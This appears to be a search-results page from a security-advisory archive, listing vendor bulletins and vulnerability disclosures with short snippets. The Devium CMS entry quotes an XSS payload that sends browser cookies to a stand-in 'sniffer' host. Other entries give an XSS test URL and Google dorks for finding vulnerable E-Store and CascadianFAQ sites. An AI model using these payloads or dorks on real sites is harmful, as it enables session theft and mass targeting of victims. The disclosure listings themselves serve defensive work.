47153 matches found
Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)
Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution 975254 Published: October 13, 2009 Version: 1.0 General Information Executive Summary This security update resolves two publicly disclosed...
osTicket v1.6 RC4 Admin Login Blind SQLi
nGenuity Information Services - Security Advisory Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection Application: osTicket v1.6 RC4 Vendor: osTicket Vendor website: http://www.osticket.com Author: Adam Baldwin [email protected] I. BACKGROUND "osTicket is a widely-us...
[Full-disclosure] [ GLSA 200906-02 ] Ruby: Denial of Service
Gentoo Linux Security Advisory GLSA 200906-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity:...
[Suspected Spam][Fwd: Re: Novell-QuickFinder Server Xss & Java remote execution Code]
NULL CODE SERVICES www.nullcode.com.ar Hunting Security Bugs! +================================================================================================================================+ + Novell-QuickFinder Server //Cross-site scripting XSS Remote Java Execution Code +...
[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal = 1.2.1 ============================================================================== Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-70.html Description of vulnerable software...
Telecom Italia Alice Pirelli routers backdoor discoverd to activate telnet/ftp/tftp from internal LAN/WLAN.
saxdax & drpepperONE Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactered by Pirelli based on Broadcom platform. saxdax & drpepperONE Router Vendor: Alice Telecom Italia...
Mozilla Foundation Security Advisory 2008-44
Mozilla Foundation Security Advisory 2008-44 Title: resource: traversal vulnerabilities Impact: Moderate Announced: September 23, 2008 Reporter: Boris Zbarsky, Georgi Guninski Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.0.2 Firefox 2.0.0.17 Thunderbird 2.0.0.17 SeaMonkey 1.1.12...
[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1636-1 [email protected] http://www.debian.org/security/ dann frazier Sep 11, 2008 http://www.debian.org/security/faq -...
Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks Advisory ID: cisco-sa-20080708-dns http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml Revision 1.0 For Public Release 2008 July 08 1800 UTC GMT...
VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------- VMware Security Advisory Advisory ID: VMSA-2008-0009 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX,...
Apache2 Undefined Charset UTF-7 XSS Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache2 Undefined Charset UTF-7 XSS Vulnerability Author: SecurityReason Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 08.08.2007 - - Public: 11.09.2007 SecurityReason Research SecurityAlert Id: 46 CVE: CVE-2007-4465 SecurityRisk: Low Affected...
Redirection Vulnerability in wp-pass.php, WordPress 2.2.1
The vulnerability found could allow an attacker to redirect victims to an arbitrary 3rd party site. This site could be a phishing site or contain malware allowing the attacker to steal account credentials or compromise hosts. This vulnerability can be found in Wordpress 2.2, however it is likely...
NeatUpload vulnerability and fix
Product: NeatUpload Synopsis: A race condition in several versions of the NeatUpload ASP.NET component could sometimes cause portions of responses to be sent to the wrong user, potentially revealing sensitive information to unauthorized users. Vulnerable versions: 1.2.11-1.2.16, 1.1.18-1.1.23, an...
CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
Title : CascadianFAQ = 4.1 index.php Remote Blind SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://eclectic-designs.com $$ : Free Dork : This FAQ is powered by CascadianFAQ DorkEx :...
Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT
Vendor: Shop-Script a division of WebAsyst LLC Application: Shop-Script www.shop-script.com I. Descriptions: Shop-Script is a PHP based shopping cart. Multiple links of shop-script are vulnerable to a new form of application attack technique called HTTP Response splitting aka CRLF Injection. HTTP...
MusicBox <= 2.3.4 XSS SQL injection Vulnerability
MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting XSS -------------------------- http://www.target.xx/?id=scriptalert/EllipsisSecurityTest//script&page=0...
XSS в Devium CMS 1.5
Advisory: XSS в Devium CMS 1.5 Home Page: http://www.devium.net/ Уязвимость/Vulnerability: XSS в гостевой книге. Exploit: scriptimg = new Image; img.src = "http://sniffer/a.jpg?"+document.cookie;/script Уязвимость/Vulnerability: Раскрытие установочного пути в админке:...
Microsoft Security Bulletin MS06-021
Microsoft Security Bulletin MS06-021 Cumulative Security Update for Internet Explorer 916281 Published: June 13, 2006 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical...
Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service 890859 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Elevation of Privilege...
Blazix 1.2 jsp view and free protected folder access
Auriemma Luigi, PivX security advisory Application: Blazix http://www.blazix.com Version: 1.2 and previous Bug: Bad management of files requested with at the end some "bad" characters Risk low: An attacker can view jsp and other server side scripts with the ability to access any password protecte...
Security Update: [CSSA-2001-SCO.25] OpenServer: various scoadmin/sysadm subprograms have buffer overflows
To: [email protected] [email protected] [email protected] [email protected] Do not reply to this mail. This security advisory is being sent from a nonexistent address in order to avoid spam problems. Caldera's contact address for UNIX security issue...
Security Bulletin MS01-030
Title: Incorrect Attachment Handling in Exchange 2000 OWA Can Execute Script Date: 06 June 2001 Software: Microsoft Exchange 2000 Server Outlook Web Access Impact: Run code of attacker's choice Bulletin: MS01-030 Microsoft encourages customers to review the Security Bulletin at:...
Serv-U FTP directory traversal vunerability (all versions)
===================================================================== Securax-SA-09 Security Advisory belgian.networking.security Dutch ===================================================================== Topic: Catsoft serv-U FTP Directory Transversal Vulnerability Announced: 2000-12-03 Updated...
[USN-2694-1] PCRE vulnerabilities
========================================================================== Ubuntu Security Notice USN-2694-1 July 29, 2015 pcre3 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...
[SECURITY] [DSA 3291-1] drupal7 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3291-1 [email protected] https://www.debian.org/security/ Sebastien Delafond June 18, 2015 https://www.debian.org/security/faq -...
XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )
Advisory: Adobe Connect Reflected XSS Author: Stas Volfus Bugsec Information Security LTD Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect Central version: 9.3 is vulnerable to Reflected XSS Cro...
[SECURITY] [DSA 3276-1] symfony security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3276-1 [email protected] http://www.debian.org/security/ David Prevot May 31, 2015 http://www.debian.org/security/faq -...
[slackware-security] proftpd (SSA:2015-111-12)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security proftpd SSA:2015-111-12 New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...
Asterisk DoS
WebSocket Server request parsing DoS...
CVE-2014-6617 Softing FG-100 Backdoor Account
COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: Softing FG-100 PB Vendor: Softing AG www.softing.com CVD ID: CVE-2014-6617 Subject: Backdoor Account Risk: High Effect: Remotely exploitable Author: Ingmar Rosenhagen Daniel Marzin Johannes Klick Date: 05.11.2014...
[ MDVSA-2014:200 ] bugzilla
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:200 http://www.mandriva.com/en/support/security/ Package : bugzilla Date : October 21, 2014 Affected: Business Server 1.0 Problem Description: Updated bugzilla packages fix security vulnerabilities: If a new...
[Onapsis Security Advisory 2014-027] SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Onapsis Security Advisory 2014-027: SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities 1. Impact on Business ===================== By exploiting this vulnerability a remote unauthenticated attacker would be able to attack other users of...
CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control
All versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting XSS vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is “...what Microsoft chose to use in MSDN, CodePlex,...
CVE-2014-3577: Apache HttpComponents client: Hostname verification susceptible to MITM attack
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Security Advisory - Apache Software Foundation Apache HttpComponents / hc.apache.org Hostname verification susceptible to MITM attack CVE-2014-3577 / CVSS 1.4 Apache HttpComponents prior to revision 4.3.5/4.0.2 may be susceptible to a 'Man in the Midd...
python security vulnerabilities
json information leak, CGIHTTPServer unauthroized files access and code execution, lz4 integer overflow...
CVE-2014-2385 - Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux)
Vulnerability title: Multiple Cross Site Scripting in Sophos Antivirus Configuration Console Linux CVE: CVE-2014-2385 Vendor: Sophos Product: Antivirus Affected version: 9.5.1 Fixed version: 9.6.1 Reported by: Pablo Catalina Details: The Configuration Console of Sophos Antivirus 9.5.1 Linux does...
[ MDVSA-2014:114 ] squid
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:114 http://www.mandriva.com/en/support/security/ Package : squid Date : June 10, 2014 Affected: Business Server 1.0 Problem Description: Updated squid packages fix security vulnerability: Due to incorrect...
E-Store (1.0 & 2.0) <= SQL Injection Vulnerability
Exploit Author: Nawaf Alkeraithe ====================================== for "E-store 1.0": Google Dork: "Powered by: PD" inurl:"page.php?id" Vulnerable page: http://target/page.php?id=SQL Injection ====================================== for "E-store 2.0": Google Dork: "Powered by: PD"...
APPLE-SA-2014-03-10-1 iOS 7.1
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-03-10-1 iOS 7.1 iOS 7.1 is now available and addresses the following: Backup Available for: iPhone 4 and later, iPod touch 5th generation and later, iPad 2 and later Impact: A maliciously crafted backup can alter the filesystem...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[USN-2035-1] Ruby vulnerabilities
========================================================================== Ubuntu Security Notice USN-2035-1 November 27, 2013 ruby1.8, ruby1.9.1 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its...
Cisco Identity Services Engine multiple security vulnerabilities
Authentication bypass, code execution...
[security bulletin] HPSBMU02883 SSRT101227 rev.1 - HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03781657 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03781657 Version: 1 HPSBMU02883...
[USN-1801-1] curl vulnerability
========================================================================== Ubuntu Security Notice USN-1801-1 April 16, 2013 curl vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu...
[USN-1787-1] Linux kernel vulnerabilities
========================================================================== Ubuntu Security Notice USN-1787-1 April 02, 2013 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Multiple XSS vulnerabilities in IBM Lotus Domino
Hello 3APA3A! I want to warn you about multiple Cross-Site Scripting vulnerabilities in IBM Lotus Domino. Last year I've announced multiple vulnerabilities in IBM software and after IBM fixed many of them, I've disclosed them. These are new vulnerabilities in Domino, which I've found at 03.05.201...
[SECURITY] [DSA 2616-1] nagios3 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2616-1 [email protected] http://www.debian.org/security/ Jonathan Wiltshire February 03, 2013 http://www.debian.org/security/faq -...
US-CERT Alert TA13-010A - Oracle Java 7 Security Manager Bypass Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System US-CERT Alert TA13-010A Oracle Java 7 Security Manager Bypass Vulnerability Original release date: January 10, 2013 Last revised: -- Systems Affected Any system using Oracle Java 7 1.7, 1.7.0 including Java Platform...
[SECURITY] [DSA 2579-1] apache2 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2579-1 [email protected] http://www.debian.org/security/ Stefan Fritsch November 30, 2012 http://www.debian.org/security/faq -...
[USN-1595-1] libxslt vulnerabilities
========================================================================== Ubuntu Security Notice USN-1595-1 October 04, 2012 libxslt vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...